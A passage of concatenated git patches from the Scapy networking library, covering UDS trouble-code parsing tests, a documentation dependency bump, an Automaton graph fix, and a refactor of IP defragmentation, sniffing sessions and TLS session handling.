UDS(b'\x59\x02\xff\x11\x07\x11\'\x022\x12\'\x01\x07\x11\'\x01\x18\x12\'\x01\x13\x12\'\x01"\x11\'\x06C\x00\'\x06S\x00\'\x161\x00\'\x14\x03\x12\'') + +assert len(rdtcipr1.DTCAndStatusRecord) == 10 +assert rdtcipr1.DTCAndStatusRecord[0].dtc.system == 0 +assert rdtcipr1.DTCAndStatusRecord[0].dtc.type == 1 +assert rdtcipr1.DTCAndStatusRecord[0].dtc.numeric_value_code == 263 +assert rdtcipr1.DTCAndStatusRecord[0].dtc.additional_information_code == 17 +assert rdtcipr1.DTCAndStatusRecord[0].status == 0x27 +assert rdtcipr1.DTCAndStatusRecord[-1].dtc.system == 0 +assert rdtcipr1.DTCAndStatusRecord[-1].dtc.type == 1 +assert rdtcipr1.DTCAndStatusRecord[-1].dtc.numeric_value_code == 1027 +assert rdtcipr1.DTCAndStatusRecord[-1].dtc.additional_information_code == 18 +assert rdtcipr1.DTCAndStatusRecord[-1].status == 0x27 + = Check UDS_RDTCI rdtci = UDS(b'\x19\x02\xff') @@ -1156,11 +1170,16 @@ assert rdtci.DTCExtendedDataRecordNumber == 0xaa = Check UDS_RDTCIPR -rdtcipr = UDS(b'\x59\x02\xff\xee\xdd\xaa') +rdtcipr = UDS(b'\x59\x02\xff\xee\xdd\xaa\x02') +rdtcipr.show() assert rdtcipr.service == 0x59 assert rdtcipr.reportType == 2 assert rdtcipr.DTCStatusAvailabilityMask == 0xff -assert rdtcipr.DTCAndStatusRecord == b'\xee\xdd\xaa' +assert rdtcipr.DTCAndStatusRecord[0].dtc.system == 3 +assert rdtcipr.DTCAndStatusRecord[0].dtc.type == 2 +assert rdtcipr.DTCAndStatusRecord[0].dtc.numeric_value_code == 3805 +assert rdtcipr.DTCAndStatusRecord[0].dtc.additional_information_code == 170 +assert rdtcipr.DTCAndStatusRecord[0].status == 2 assert not rdtcipr.answers(rdtci) From 63838a3fb471907fa5cc30dc1b92311666263078 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 12 Sep 2023 15:04:36 +0200 Subject: [PATCH 1088/1632] Fix readthedocs: update doc dependencies --- pyproject.toml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/pyproject.toml b/pyproject.toml index 11a805bef76..15d52fc90eb 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -56,8 +56,8 @@ all = [ "matplotlib", ] docs = [ - "sphinx>=3.0.0", - "sphinx_rtd_theme>=0.4.3", + "sphinx>=7.0.0", + "sphinx_rtd_theme>=1.3.0", "tox>=3.0.0", ] From f311149a3073dc592fd6488ca83574dcad782e1a Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Wed, 13 Sep 2023 12:29:01 +0000 Subject: [PATCH 1089/1632] Fix Automaton.graph() with indirection --- scapy/automaton.py | 23 ++++++++++++++++++++--- test/scapy/automaton.uts | 21 +++++++++++++++++++++ 2 files changed, 41 insertions(+), 3 deletions(-) diff --git a/scapy/automaton.py b/scapy/automaton.py index a12fb6953c5..27e2cef3e1e 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -775,20 +775,37 @@ def build_graph(self): s += se for st in self.states.values(): - for n in st.atmt_origfunc.__code__.co_names + st.atmt_origfunc.__code__.co_consts: # noqa: E501 + names = list( + st.atmt_origfunc.__code__.co_names + + st.atmt_origfunc.__code__.co_consts + ) + while names: + n = names.pop() if n in self.states: - s += '\t"%s" -> "%s" [ color=green ];\n' % (st.atmt_state, n) # noqa: E501 + s += '\t"%s" -> "%s" [ color=green ];\n' % (st.atmt_state, n) + elif n in self.__dict__: + # function indirection + if callable(self.__dict__[n]): + names.extend(self.__dict__[n].__code__.co_names) + names.extend(self.__dict__[n].__code__.co_consts) for c, k, v in ([("purple", k, v) for k, v in self.conditions.items()] + # noqa: E501 [("red", k, v) for k, v in self.recv_conditions.items()] + # noqa: E501 [("orange", k, v) for k, v in self.ioevents.items()]): for f in v: - for n in f.__code__.co_names + f.__code__.co_consts: + names = list(f.__code__.co_names + f.__code__.co_consts) + while names: + n = names.pop() if n in self.states: line = f.atmt_condname for x in self.actions[f.atmt_condname]: line += "\\l>[%s]" % x.__name__ s += '\t"%s" -> "%s" [label="%s", color=%s];\n' % (k, n, line, c) # noqa: E501 + elif n in self.__dict__: + # function indirection + if callable(self.__dict__[n]): + names.extend(self.__dict__[n].__code__.co_names) + names.extend(self.__dict__[n].__code__.co_consts) for k, timers in self.timeout.items(): for timer in timers: for n in (timer._func.__code__.co_names + diff --git a/test/scapy/automaton.uts b/test/scapy/automaton.uts index bc103f3126d..ab107b8bc74 100644 --- a/test/scapy/automaton.uts +++ b/test/scapy/automaton.uts @@ -446,6 +446,27 @@ graph = HelloWorld.build_graph() assert graph.startswith("digraph") assert '"BEGIN" -> "END"' in graph += Automaton graph - with indirection +~ automaton + +class HelloWorld(Automaton): + @ATMT.state(initial=1) + def BEGIN(self): + self.count1 = 0 + self.count2 = 0 + @ATMT.condition(BEGIN) + def cnd_1(self): + self.cnd_generic() + def cnd_generic(self): + raise END + @ATMT.state(final=1) + def END(self): + pass + +graph = HelloWorld.build_graph() +assert graph.startswith("digraph") +assert '"BEGIN" -> "END"' in graph + = TCP_client automaton ~ automaton netaccess needs_root * This test retries on failure because it may fail quite easily From 219f2febd8456c440988b329b44c1dbcd0e47d0d Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 19 Sep 2023 08:29:31 +0200 Subject: [PATCH 1090/1632] Cleanup IP fragmentation, TCP session and TLS sessions (#4082) --- doc/scapy/layers/automotive.rst | 4 +- doc/scapy/usage.rst | 3 +- scapy/arch/bpf/supersocket.py | 4 +- scapy/arch/libpcap.py | 9 +- scapy/arch/linux.py | 6 +- scapy/automaton.py | 8 +- scapy/config.py | 20 +- scapy/contrib/automotive/bmw/hsfz.py | 13 +- scapy/contrib/automotive/doip.py | 13 +- scapy/contrib/automotive/ecu.py | 9 +- scapy/contrib/isotp/isotp_native_socket.py | 7 +- scapy/contrib/isotp/isotp_soft_socket.py | 6 +- scapy/contrib/isotp/isotp_utils.py | 22 +- scapy/layers/dcerpc.py | 14 +- scapy/layers/inet.py | 202 +++++++------- scapy/layers/netflow.py | 21 +- scapy/layers/tls/handshake.py | 11 +- scapy/layers/tls/keyexchange.py | 12 +- scapy/layers/tls/record.py | 34 ++- scapy/layers/tls/record_sslv2.py | 2 +- scapy/layers/tls/record_tls13.py | 20 +- scapy/layers/tls/session.py | 154 +++++++---- scapy/libs/extcap.py | 4 +- scapy/packet.py | 18 +- scapy/sendrecv.py | 45 ++-- scapy/sessions.py | 254 ++++++++---------- scapy/supersocket.py | 38 +-- scapy/tools/UTscapy.py | 5 +- scapy/utils.py | 35 ++- test/configs/linux.utsc | 8 +- test/configs/windows.utsc | 5 +- test/configs/windows2.utsc | 16 +- test/contrib/automotive/ecu.uts | 16 +- test/contrib/isotp_soft_socket.uts | 9 +- test/pcaps/tls_tcp_frag_withnss.pcap.gz | Bin 0 -> 5666 bytes test/scapy/layers/inet.uts | 99 ++++++- test/{ => scapy/layers}/tls/__init__.py | 0 test/{ => scapy/layers/tls}/cert.uts | 0 test/{ => scapy/layers}/tls/example_client.py | 0 test/{ => scapy/layers}/tls/example_server.py | 0 test/{ => scapy/layers}/tls/pki/ca_cert.pem | 0 test/{ => scapy/layers}/tls/pki/ca_key.pem | 0 test/{ => scapy/layers}/tls/pki/cli_cert.pem | 0 test/{ => scapy/layers}/tls/pki/cli_key.pem | 0 test/{ => scapy/layers}/tls/pki/srv_cert.pem | 0 test/{ => scapy/layers}/tls/pki/srv_key.pem | 0 test/{ => scapy/layers/tls}/sslv2.uts | 4 +- test/{ => scapy/layers/tls}/tls.uts | 49 +++- test/{ => scapy/layers/tls}/tls13.uts | 2 + .../layers/tls/tlsclientserver.uts} | 14 +- test/testsocket.py | 6 +- 51 files changed, 707 insertions(+), 514 deletions(-) create mode 100644 test/pcaps/tls_tcp_frag_withnss.pcap.gz rename test/{ => scapy/layers}/tls/__init__.py (100%) rename test/{ => scapy/layers/tls}/cert.uts (100%) rename test/{ => scapy/layers}/tls/example_client.py (100%) mode change 100755 => 100644 rename test/{ => scapy/layers}/tls/example_server.py (100%) mode change 100755 => 100644 rename test/{ => scapy/layers}/tls/pki/ca_cert.pem (100%) rename test/{ => scapy/layers}/tls/pki/ca_key.pem (100%) rename test/{ => scapy/layers}/tls/pki/cli_cert.pem (100%) rename test/{ => scapy/layers}/tls/pki/cli_key.pem (100%) rename test/{ => scapy/layers}/tls/pki/srv_cert.pem (100%) rename test/{ => scapy/layers}/tls/pki/srv_key.pem (100%) rename test/{ => scapy/layers/tls}/sslv2.uts (99%) rename test/{ => scapy/layers/tls}/tls.uts (96%) rename test/{ => scapy/layers/tls}/tls13.uts (99%) rename test/{tls/tests_tls_netaccess.uts => scapy/layers/tls/tlsclientserver.uts} (95%) diff --git a/doc/scapy/layers/automotive.rst b/doc/scapy/layers/automotive.rst index bf74fc3c561..8316d8e14e9 100644 --- a/doc/scapy/layers/automotive.rst +++ b/doc/scapy/layers/automotive.rst @@ -1158,7 +1158,7 @@ then casted to ``UDS`` objects through the ``basecls`` parameter Usage example:: with PcapReader("test/contrib/automotive/ecu_trace.pcap") as sock: - udsmsgs = sniff(session=ISOTPSession, session_kwargs={"use_ext_addr":False, "basecls":UDS}, count=50, opened_socket=sock) + udsmsgs = sniff(session=ISOTPSession(use_ext_addr=False, basecls=UDS), count=50, opened_socket=sock) ecu = Ecu() @@ -1183,7 +1183,7 @@ Usage example:: session = EcuSession() with PcapReader("test/contrib/automotive/ecu_trace.pcap") as sock: - udsmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "use_ext_addr":False, "basecls":UDS}, count=50, opened_socket=sock) + udsmsgs = sniff(session=ISOTPSession(use_ext_addr=False, basecls=UDS, supersession=session)), count=50, opened_socket=sock) ecu = session.ecu print(ecu.log) diff --git a/doc/scapy/usage.rst b/doc/scapy/usage.rst index a06b5ba200d..dc4aca70014 100644 --- a/doc/scapy/usage.rst +++ b/doc/scapy/usage.rst @@ -783,9 +783,8 @@ Those sessions can be used using the ``session=`` parameter of ``sniff()``. Exam .. note:: To implement your own Session class, in order to support another flow-based protocol, start by copying a sample from `scapy/sessions.py `_ - Your custom ``Session`` class only needs to extend the :py:class:`~scapy.sessions.DefaultSession` class, and implement a ``on_packet_received`` function, such as in the example. + Your custom ``Session`` class only needs to extend the :py:class:`~scapy.sessions.DefaultSession` class, and implement a ``process`` or a ``recv`` function, such as in the examples. -.. note:: Would you need it, you can use: ``class TLS_over_TCP(TLSSession, TCPSession): pass`` to sniff TLS packets that are defragmented. How to use TCPSession to defragment TCP packets ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ diff --git a/scapy/arch/bpf/supersocket.py b/scapy/arch/bpf/supersocket.py index 4f3aea6cd32..3e57a64d1b0 100644 --- a/scapy/arch/bpf/supersocket.py +++ b/scapy/arch/bpf/supersocket.py @@ -425,9 +425,9 @@ def nonblock_recv(self): class L3bpfSocket(L2bpfSocket): - def recv(self, x=BPF_BUFFER_LENGTH): + def recv(self, x=BPF_BUFFER_LENGTH, **kwargs): """Receive on layer 3""" - r = SuperSocket.recv(self, x) + r = SuperSocket.recv(self, x, **kwargs) if r: r.payload.time = r.time return r.payload diff --git a/scapy/arch/libpcap.py b/scapy/arch/libpcap.py index 7ac3fcf66fe..fc4b210f4fa 100644 --- a/scapy/arch/libpcap.py +++ b/scapy/arch/libpcap.py @@ -38,13 +38,14 @@ import scapy.consts from typing import ( - cast, + Any, Dict, List, NoReturn, Optional, Tuple, Type, + cast, ) if not scapy.consts.WINDOWS: @@ -571,9 +572,9 @@ def send(self, x): class L3pcapSocket(L2pcapSocket): desc = "read/write packets at layer 3 using only libpcap" - def recv(self, x=MTU): - # type: (int) -> Optional[Packet] - r = L2pcapSocket.recv(self, x) + def recv(self, x=MTU, **kwargs): + # type: (int, **Any) -> Optional[Packet] + r = L2pcapSocket.recv(self, x, **kwargs) if r: r.payload.time = r.time return r.payload diff --git a/scapy/arch/linux.py b/scapy/arch/linux.py index d597ca4457a..58100e5479a 100644 --- a/scapy/arch/linux.py +++ b/scapy/arch/linux.py @@ -593,9 +593,9 @@ def send(self, x): class L3PacketSocket(L2Socket): desc = "read/write packets at layer 3 using Linux PF_PACKET sockets" - def recv(self, x=MTU): - # type: (int) -> Optional[Packet] - pkt = SuperSocket.recv(self, x) + def recv(self, x=MTU, **kwargs): + # type: (int, **Any) -> Optional[Packet] + pkt = SuperSocket.recv(self, x, **kwargs) if pkt and self.lvl == 2: pkt.payload.time = pkt.time return pkt.payload diff --git a/scapy/automaton.py b/scapy/automaton.py index 27e2cef3e1e..63a03ce3f03 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -636,11 +636,13 @@ def fileno(self): # type: () -> int return self.spb.fileno() - def recv(self, n=MTU): - # type: (Optional[int]) -> Any + # note: _ATMT_supersocket may return bytes in certain cases, which + # is expected. We cheat on typing. + def recv(self, n=MTU, **kwargs): # type: ignore + # type: (int, **Any) -> Any r = self.spb.recv(n) if self.proto is not None and r is not None: - r = self.proto(r) + r = self.proto(r, **kwargs) return r def close(self): diff --git a/scapy/config.py b/scapy/config.py index 3be0bfec4a7..7c4215998ff 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -701,6 +701,13 @@ def _iface_changer(attr, val, old): return val # type: ignore +def _reset_tls_nss_keys(attr, val, old): + # type: (str, Any, Any) -> Any + """Reset conf.tls_nss_keys when conf.tls_nss_filename changes""" + conf.tls_nss_keys = None + return val + + class Conf(ConfClass): """ This object contains the configuration of Scapy. @@ -775,7 +782,8 @@ class Conf(ConfClass): filter = "" #: when 1, store received packet that are not matched into `debug.recv` debug_match = False - #: When 1, print some TLS session secrets when they are computed. + #: When 1, print some TLS session secrets when they are computed, and + #: warn about the session recognition. debug_tls = False wepkey = "" #: holds the Scapy interface list and manager @@ -901,6 +909,16 @@ class Conf(ConfClass): #: a safety mechanism: the maximum amount of items included in a PacketListField #: or a FieldListField max_list_count = 100 + #: When the TLS module is loaded (not by default), the following turns on sessions + tls_session_enable = False + #: Filename containing NSS Keys Log + tls_nss_filename = Interceptor( + "tls_nss_filename", + None, + _reset_tls_nss_keys + ) + #: Dictionary containing parsed NSS Keys + tls_nss_keys = None def __getattribute__(self, attr): # type: (str) -> Any diff --git a/scapy/contrib/automotive/bmw/hsfz.py b/scapy/contrib/automotive/bmw/hsfz.py index 376a968e4b4..558141fc8bc 100644 --- a/scapy/contrib/automotive/bmw/hsfz.py +++ b/scapy/contrib/automotive/bmw/hsfz.py @@ -19,6 +19,7 @@ from scapy.data import MTU from typing import ( + Any, Optional, Tuple, Type, @@ -88,8 +89,8 @@ def __init__(self, ip='127.0.0.1', port=6801): StreamSocket.__init__(self, s, HSFZ) self.buffer = b"" - def recv(self, x=MTU): - # type: (int) -> Optional[Packet] + def recv(self, x=MTU, **kwargs): + # type: (int, **Any) -> Optional[Packet] if self.buffer: len_data = self.buffer[:4] else: @@ -104,7 +105,7 @@ def recv(self, x=MTU): if len(self.buffer) != len_int: return None - pkt = self.basecls(self.buffer) # type: Packet + pkt = self.basecls(self.buffer, **kwargs) # type: Packet self.buffer = b"" return pkt @@ -141,11 +142,11 @@ def send(self, x): self.close() return 0 - def recv(self, x=MTU): - # type: (int) -> Optional[Packet] + def recv(self, x=MTU, **kwargs): + # type: (int, **Any) -> Optional[Packet] pkt = super(UDS_HSFZSocket, self).recv(x) if pkt: - return self.outputcls(bytes(pkt.payload)) + return self.outputcls(bytes(pkt.payload), **kwargs) else: return pkt diff --git a/scapy/contrib/automotive/doip.py b/scapy/contrib/automotive/doip.py index bce9944aaa0..096bdb9e586 100644 --- a/scapy/contrib/automotive/doip.py +++ b/scapy/contrib/automotive/doip.py @@ -33,6 +33,7 @@ from scapy.data import MTU from typing import ( + Any, Union, Tuple, Optional, @@ -294,8 +295,8 @@ def __init__(self, ip='127.0.0.1', port=13400, activate_routing=True, self._activate_routing( source_address, target_address, activation_type, reserved_oem) - def recv(self, x=MTU): - # type: (int) -> Optional[Packet] + def recv(self, x=MTU, **kwargs): + # type: (int, **Any) -> Optional[Packet] if self.buffer: len_data = self.buffer[:8] else: @@ -310,7 +311,7 @@ def recv(self, x=MTU): if len(self.buffer) != len_int: return None - pkt = self.basecls(self.buffer) # type: Packet + pkt = self.basecls(self.buffer, **kwargs) # type: Packet self.buffer = b"" return pkt @@ -407,9 +408,9 @@ def send(self, x): return super(UDS_DoIPSocket, self).send(pkt) - def recv(self, x=MTU): - # type: (int) -> Optional[Packet] - pkt = super(UDS_DoIPSocket, self).recv(x) + def recv(self, x=MTU, **kwargs): + # type: (int, **Any) -> Optional[Packet] + pkt = super(UDS_DoIPSocket, self).recv(x, **kwargs) if pkt and pkt.payload_type == 0x8001: return pkt.payload else: diff --git a/scapy/contrib/automotive/ecu.py b/scapy/contrib/automotive/ecu.py index c2caa769de6..7458468c95b 100644 --- a/scapy/contrib/automotive/ecu.py +++ b/scapy/contrib/automotive/ecu.py @@ -469,17 +469,16 @@ class EcuSession(DefaultSession): """ def __init__(self, *args, **kwargs): # type: (Any, Any) -> None - DefaultSession.__init__(self, *args, **kwargs) self.ecu = Ecu(logging=kwargs.pop("logging", True), verbose=kwargs.pop("verbose", True), store_supported_responses=kwargs.pop("store_supported_responses", True)) # noqa: E501 + super(EcuSession, self).__init__(*args, **kwargs) - def on_packet_received(self, pkt): - # type: (Optional[Packet]) -> None + def process(self, pkt: Packet) -> Optional[Packet]: if not pkt: - return + return None self.ecu.update(pkt) - DefaultSession.on_packet_received(self, pkt) + return pkt class EcuResponse: diff --git a/scapy/contrib/isotp/isotp_native_socket.py b/scapy/contrib/isotp/isotp_native_socket.py index 77e4d0f7af9..34a77cb84aa 100644 --- a/scapy/contrib/isotp/isotp_native_socket.py +++ b/scapy/contrib/isotp/isotp_native_socket.py @@ -23,6 +23,7 @@ # Typing imports from typing import ( + Any, Optional, Union, Tuple, @@ -387,9 +388,9 @@ def recv_raw(self, x=0xffff): ts = get_last_packet_timestamp(self.ins) return self.basecls, pkt, ts - def recv(self, x=0xffff): - # type: (int) -> Optional[Packet] - msg = SuperSocket.recv(self, x) + def recv(self, x=0xffff, **kwargs): + # type: (int, **Any) -> Optional[Packet] + msg = SuperSocket.recv(self, x, **kwargs) if msg is None: return msg diff --git a/scapy/contrib/isotp/isotp_soft_socket.py b/scapy/contrib/isotp/isotp_soft_socket.py index cc6be464d70..96411c41908 100644 --- a/scapy/contrib/isotp/isotp_soft_socket.py +++ b/scapy/contrib/isotp/isotp_soft_socket.py @@ -186,9 +186,9 @@ def recv_raw(self, x=0xffff): return self.basecls, tup[0], float(tup[1]) return self.basecls, None, None - def recv(self, x=0xffff): - # type: (int) -> Optional[Packet] - msg = super(ISOTPSoftSocket, self).recv(x) + def recv(self, x=0xffff, **kwargs): + # type: (int, **Any) -> Optional[Packet] + msg = super(ISOTPSoftSocket, self).recv(x, **kwargs) if msg is None: return None diff --git a/scapy/contrib/isotp/isotp_utils.py b/scapy/contrib/isotp/isotp_utils.py index 49269f20aab..da1d5e73ab9 100644 --- a/scapy/contrib/isotp/isotp_utils.py +++ b/scapy/contrib/isotp/isotp_utils.py @@ -14,12 +14,15 @@ from scapy.utils import EDecimal from scapy.packet import Packet from scapy.sessions import DefaultSession +from scapy.supersocket import SuperSocket from scapy.contrib.isotp.isotp_packet import ISOTP, N_PCI_CF, N_PCI_SF, \ N_PCI_FF, N_PCI_FC # Typing imports from typing import ( + cast, Iterable, + Iterator, Optional, Union, List, @@ -336,20 +339,23 @@ class ISOTPSession(DefaultSession): def __init__(self, *args, **kwargs): # type: (Any, Any) -> None - super(ISOTPSession, self).__init__(*args, **kwargs) self.m = ISOTPMessageBuilder( use_ext_address=kwargs.pop("use_ext_address", None), rx_id=kwargs.pop("rx_id", None), basecls=kwargs.pop("basecls", ISOTP)) + super(ISOTPSession, self).__init__(*args, **kwargs) - def on_packet_received(self, pkt): - # type: (Optional[Packet]) -> None + def recv(self, sock: SuperSocket) -> Iterator[Packet]: + """ + Will be called by sniff() to ask for a packet + """ + pkt = sock.recv() if not pkt: return self.m.feed(pkt) while len(self.m) > 0: - rcvd = self.m.pop() - if self._supersession: - self._supersession.on_packet_received(rcvd) - else: - super(ISOTPSession, self).on_packet_received(rcvd) + rcvd = cast(Optional[Packet], self.m.pop()) + if rcvd: + rcvd = self.process(rcvd) + if rcvd: + yield rcvd diff --git a/scapy/layers/dcerpc.py b/scapy/layers/dcerpc.py index 8caf6857fb3..e1901c30b1c 100644 --- a/scapy/layers/dcerpc.py +++ b/scapy/layers/dcerpc.py @@ -91,6 +91,11 @@ EPacketListField, ) +# Typing imports +from typing import ( + Optional, +) + # DCE/RPC Packet DCE_RPC_TYPE = { @@ -1895,12 +1900,11 @@ def _process_dcerpc_packet(self, pkt): pkt = self._parse_with_opnum(pkt, opnum, opts) return pkt - def on_packet_received(self, pkt): + def process(self, pkt: Packet) -> Optional[Packet]: if DceRpc5 in pkt: - return super(DceRpcSession, self).on_packet_received( - self._process_dcerpc_packet(pkt) - ) - return super(DceRpcSession, self).on_packet_received(pkt) + return self._process_dcerpc_packet(pkt) + else: + return pkt # --- TODO cleanup below diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index ad12ce82515..8741b3bdad6 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -527,7 +527,6 @@ def i2h(self, pkt, x): class IP(Packet, IPTools): - __slots__ = ["_defrag_pos"] name = "IP" fields_desc = [BitField("version", 4, 4), BitField("ihl", None, 4), @@ -625,38 +624,7 @@ def mysummary(self): def fragment(self, fragsize=1480): """Fragment IP datagrams""" - lastfragsz = fragsize - fragsize -= fragsize % 8 - lst = [] - fnb = 0 - fl = self - while fl.underlayer is not None: - fnb += 1 - fl = fl.underlayer - - for p in fl: - s = raw(p[fnb].payload) - if len(s) <= lastfragsz: - lst.append(p) - continue - - nb = (len(s) - lastfragsz + fragsize - 1) // fragsize + 1 - for i in range(nb): - q = p.copy() - del q[fnb].payload - del q[fnb].chksum - del q[fnb].len - if i != nb - 1: - q[fnb].flags |= 1 - fragend = (i + 1) * fragsize - else: - fragend = i * fragsize + lastfragsz - q[fnb].frag += i * fragsize // 8 - r = conf.raw_layer(load=s[i * fragsize:fragend]) - r.overload_fields = p[fnb].payload.overload_fields.copy() - q.add_payload(r) - lst.append(q) - return lst + return fragment(self, fragsize=fragsize) def in4_pseudoheader(proto, u, plen): @@ -1145,6 +1113,9 @@ def inet_register_l3(l2, l3): @conf.commands.register def fragment(pkt, fragsize=1480): """Fragment a big IP datagram""" + if fragsize < 8: + warning("fragsize cannot be lower than 8") + fragsize = max(fragsize, 8) lastfragsz = fragsize fragsize -= fragsize % 8 lst = [] @@ -1189,86 +1160,115 @@ def overlap_frag(p, overlap, fragsize=8, overlap_fragsize=None): return qfrag + fragment(p, fragsize) -def _defrag_list(lst, defrag, missfrag): - """Internal usage only. Part of the _defrag_logic""" - p = lst[0] - lastp = lst[-1] - if p.frag > 0 or lastp.flags.MF: # first or last fragment missing - missfrag.extend(lst) - return - p = p.copy() - if conf.padding_layer in p: - del p[conf.padding_layer].underlayer.payload - ip = p[IP] - if ip.len is None or ip.ihl is None: - c_len = len(ip.payload) - else: - c_len = ip.len - (ip.ihl << 2) - txt = conf.raw_layer() - for q in lst[1:]: - if c_len != q.frag << 3: # Wrong fragmentation offset - if c_len > q.frag << 3: - warning("Fragment overlap (%i > %i) %r || %r || %r" % (c_len, q.frag << 3, p, txt, q)) # noqa: E501 - missfrag.extend(lst) - break - if q[IP].len is None or q[IP].ihl is None: - c_len += len(q[IP].payload) +class BadFragments(ValueError): + def __init__(self, *args, **kwargs): + self.frags = kwargs.pop("frags", None) + super(BadFragments, self).__init__(*args, **kwargs) + + +def _defrag_iter_and_check_offsets(frags): + """ + Internal generator used in _defrag_ip_pkt + """ + offset = 0 + for pkt, o, length in frags: + if offset != o: + if offset > o: + op = ">" + else: + op = "<" + warning("Fragment overlap (%i %s %i) on %r" % (offset, op, o, pkt)) + raise BadFragments + offset += length + yield bytes(pkt[IP].payload) + + +def _defrag_ip_pkt(pkt, frags): + """ + Defragment a single IP packet. + + :param pkt: the new pkt + :param frags: a defaultdict(list) used for storage + :return: a tuple (fragmented, defragmented_value) + """ + ip = pkt[IP] + if pkt.frag != 0 or ip.flags.MF: + # fragmented ! + uid = (ip.id, ip.src, ip.dst, ip.proto) + if ip.len is None or ip.ihl is None: + fraglen = len(ip.payload) else: - c_len += q[IP].len - (q[IP].ihl << 2) - if conf.padding_layer in q: - del q[conf.padding_layer].underlayer.payload - txt.add_payload(q[IP].payload.copy()) - if q.time > p.time: - p.time = q.time - else: - ip.flags.MF = False - del ip.chksum - del ip.len - p = p / txt - p._defrag_pos = max(x._defrag_pos for x in lst) - defrag.append(p) + fraglen = ip.len - (ip.ihl << 2) + # (pkt, frag offset, frag len) + frags[uid].append((pkt, ip.frag << 3, fraglen)) + if not ip.flags.MF: # no more fragments = last fragment + curfrags = sorted(frags[uid], key=lambda x: x[1]) # sort by offset + try: + data = b"".join(_defrag_iter_and_check_offsets(curfrags)) + except ValueError: + # bad fragment + badfrags = frags[uid] + del frags[uid] + raise BadFragments(frags=badfrags) + # re-build initial packet without fragmentation + p = curfrags[0][0].copy() + pay_class = p[IP].payload.__class__ + p[IP].flags.MF = False + p[IP].remove_payload() + p[IP].len = None + p[IP].chksum = None + # append defragmented payload + p /= pay_class(data) + # cleanup + del frags[uid] + return True, p + return True, None + return False, pkt def _defrag_logic(plist, complete=False): - """Internal function used to defragment a list of packets. + """ + Internal function used to defragment a list of packets. It contains the logic behind the defrag() and defragment() functions """ - frags = defaultdict(lambda: []) + frags = defaultdict(list) final = [] - pos = 0 - for p in plist: - p._defrag_pos = pos - pos += 1 - if IP in p: - ip = p[IP] - if ip.frag != 0 or ip.flags.MF: - uniq = (ip.id, ip.src, ip.dst, ip.proto) - frags[uniq].append(p) - continue - final.append(p) - - defrag = [] - missfrag = [] - for lst in frags.values(): - lst.sort(key=lambda x: x.frag) - _defrag_list(lst, defrag, missfrag) - defrag2 = [] - for p in defrag: - q = p.__class__(raw(p)) - q._defrag_pos = p._defrag_pos - q.time = p.time - defrag2.append(q) + notfrag = [] + badfrag = [] + # Defrag + for i, pkt in enumerate(plist): + if IP not in pkt: + # no IP layer + if complete: + final.append(pkt) + continue + try: + fragmented, defragmented_value = _defrag_ip_pkt( + pkt, + frags, + ) + except BadFragments as ex: + if complete: + final.extend(ex.frags) + else: + badfrag.extend(ex.frags) + continue + if complete and defragmented_value: + final.append(defragmented_value) + elif defragmented_value: + if fragmented: + final.append(defragmented_value) + else: + notfrag.append(defragmented_value) + # Return if complete: - final.extend(defrag2) - final.extend(missfrag) - final.sort(key=lambda x: x._defrag_pos) if hasattr(plist, "listname"): name = "Defragmented %s" % plist.listname else: name = "Defragmented" return PacketList(final, name=name) else: - return PacketList(final), PacketList(defrag2), PacketList(missfrag) + return PacketList(notfrag), PacketList(final), PacketList(badfrag) @conf.commands.register @@ -1911,7 +1911,7 @@ def parse_args(self, ip, port, srcip=None, **kargs): self.src = self.l4.src self.sack = self.l4[TCP].ack self.rel_seq = None - self.rcvbuf = TCPSession(prn=self._transmit_packet, store=False) + self.rcvbuf = TCPSession() bpf = "host %s and host %s and port %i and port %i" % (self.src, self.dst, self.sport, @@ -1996,7 +1996,7 @@ def receive_data(self, pkt): # Answer with an Ack self.send(self.l4) # Process data - will be sent to the SuperSocket through this - self.rcvbuf.on_packet_received(pkt) + self._transmit_packet(self.rcvbuf.process(pkt)) @ATMT.ioevent(ESTABLISHED, name="tcp", as_supersocket="tcplink") def outgoing_data_received(self, fd): diff --git a/scapy/layers/netflow.py b/scapy/layers/netflow.py index 0ce79dd4a91..69cfc6b77a3 100644 --- a/scapy/layers/netflow.py +++ b/scapy/layers/netflow.py @@ -64,11 +64,16 @@ ) from scapy.packet import Packet, bind_layers, bind_bottom_up from scapy.plist import PacketList -from scapy.sessions import IPSession, DefaultSession +from scapy.sessions import IPSession from scapy.layers.inet import UDP from scapy.layers.inet6 import IP6Field +# Typing imports +from typing import ( + Optional, +) + class NetflowHeader(Packet): name = "Netflow Header" @@ -1596,25 +1601,21 @@ class NetflowSession(IPSession): See help(scapy.layers.netflow) for more infos. """ def __init__(self, *args, **kwargs): - IPSession.__init__(self, *args, **kwargs) self.definitions = {} self.definitions_opts = {} self.ignored = set() + super(NetflowSession, self).__init__(*args, **kwargs) - def _process_packet(self, pkt): + def process(self, pkt: Packet) -> Optional[Packet]: + pkt = super(NetflowSession, self).process(pkt) + if not pkt: + return _netflowv9_defragment_packet(pkt, self.definitions, self.definitions_opts, self.ignored) return pkt - def on_packet_received(self, pkt): - # First, defragment IP if necessary - pkt = self._ip_process_packet(pkt) - # Now handle NetflowV9 defragmentation - pkt = self._process_packet(pkt) - DefaultSession.on_packet_received(self, pkt) - class NetflowOptionsRecordScopeV9(NetflowRecordV9): name = "Netflow Options Template Record V9/10 - Scope" diff --git a/scapy/layers/tls/handshake.py b/scapy/layers/tls/handshake.py index eeffad947bb..9d283e3ea75 100644 --- a/scapy/layers/tls/handshake.py +++ b/scapy/layers/tls/handshake.py @@ -463,7 +463,7 @@ def tls_session_update(self, msg_str): # RFC 8701: GREASE of TLS will send unknown versions # here. We have to ignore them if ver in _tls_version: - self.tls_session.advertised_tls_version = ver + s.advertised_tls_version = ver break if isinstance(e, 